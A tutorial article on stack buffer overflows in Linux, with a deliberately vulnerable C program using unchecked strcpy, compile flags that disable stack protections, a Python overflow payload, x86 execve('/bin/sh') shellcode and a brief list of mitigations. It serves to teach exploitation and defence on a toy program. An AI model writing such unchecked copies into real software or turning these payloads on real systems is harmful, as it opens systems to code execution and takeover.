Hands-on Penetration Testing with Python: Stack Buffer Overflow in Linux

Introduction

Penetration testing involves simulating cyber attacks to identify vulnerabilities in a system before malicious hackers can exploit them. One of the most critical security flaws in software is the stack buffer overflow, which attackers can use to execute arbitrary code and gain control over a system.

This article explores stack buffer overflow in Linux, assembly code concepts, and how Python can be used for penetration testing.


Understanding Stack Buffer Overflow

A stack buffer overflow occurs when a program writes more data into a buffer on the stack than it was allocated. This excess data can overwrite adjacent memory, including the function’s saved frame pointer (SFP) and return address, potentially leading to arbitrary code execution.

Example: Vulnerable C Code

Consider the following C program, which contains a stack buffer overflow vulnerability:

c

CopyEdit

#include <stdio.h>

#include <string.h>

void vulnerable_function(char *user_input) {

    char buffer[32];  // Small buffer size

    strcpy(buffer, user_input);  // Unsafe function

    printf(“User input: %s\n”, buffer);

}

int main(int argc, char *argv[]) {

    if (argc < 2) {

        printf(“Usage: %s <input>\n”, argv[0]);

        return 1;

    }

    vulnerable_function(argv[1]); 

    return 0;

}

What’s Wrong with This Code?

  • The function vulnerable_function does not check the length of user_input.
  • If user_input exceeds 32 bytes, it overwrites adjacent memory, including the return address.
  • An attacker can craft input that redirects execution to malicious code.

Exploiting Buffer Overflow in Linux

1. Analyzing the Vulnerable Program

Compile the program with disabled security protections:

bash

CopyEdit

gcc -fno-stack-protector -z execstack -o exploit target.c

  • -fno-stack-protector: Disables stack protection.
  • -z execstack: Allows execution of injected shellcode.

Run the program with a long input to check for crashes:

bash

CopyEdit

./exploit $(python3 -c ‘print(“A”*100)’)

If it crashes, the buffer overflow is working.


2. Using Python to Exploit the Vulnerability

Python can help automate buffer overflow exploitation. Here’s a basic exploit script:

python

CopyEdit

import sys

# Overflow payload: 40 “A”s followed by an address overwrite

payload = b”A” * 40 

payload += b”\xef\xbe\xad\xde”  # Example return address (Little Endian format)

print(“Sending payload…”)

sys.stdout.buffer.write(payload)

Redirect output to the vulnerable program:

bash

CopyEdit

python3 exploit.py | ./exploit

If successful, the program will try to execute code at the overwritten address.


Writing Shellcode in Assembly

To fully exploit a buffer overflow, attackers inject shellcode, which executes arbitrary commands. Below is a simple Linux shellcode in x86 assembly:

assembly

CopyEdit

section .text

    global _start

_start:

    ; syscall execve(“/bin/sh”, NULL, NULL)

    xor eax, eax

    push eax

    push 0x68732f6e

    push 0x69622f2f

    mov ebx, esp

    xor ecx, ecx

    xor edx, edx

    mov al, 11  ; execve syscall number

    int 0x80    ; Trigger syscall

Assemble and extract shellcode:

bash

CopyEdit

nasm -f elf32 shellcode.asm -o shellcode.o

objcopy -O binary -j .text shellcode.o shellcode.bin

hexdump -v -e ‘”\\x” 1/1 “%02x”‘ shellcode.bin

Inject the shellcode into Python:

python

CopyEdit

shellcode = b”\x31\xc0\x50\x68\x2f\x2f\x62\x69\x68\x2f\x73\x68\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80″

payload = b”A” * 40 + shellcode

sys.stdout.buffer.write(payload)


Mitigating Stack Buffer Overflow

Modern Linux systems implement several security mechanisms to prevent buffer overflow attacks:

  1. Stack Canaries (-fstack-protector)
  2. Address Space Layout Randomization (ASLR)
  3. Non-Executable Stack (NX-bit)

To check ASLR status:

bash

CopyEdit

cat /proc/sys/kernel/randomize_va_space

(1 = Partial, 2 = Full, 0 = Disabled)


Conclusion

Stack buffer overflow is a powerful exploitation technique often used in penetration testing. By understanding how memory works and leveraging Python for automation, ethical hackers can identify and mitigate security risks.

Leave a Comment

Your email address will not be published. Required fields are marked *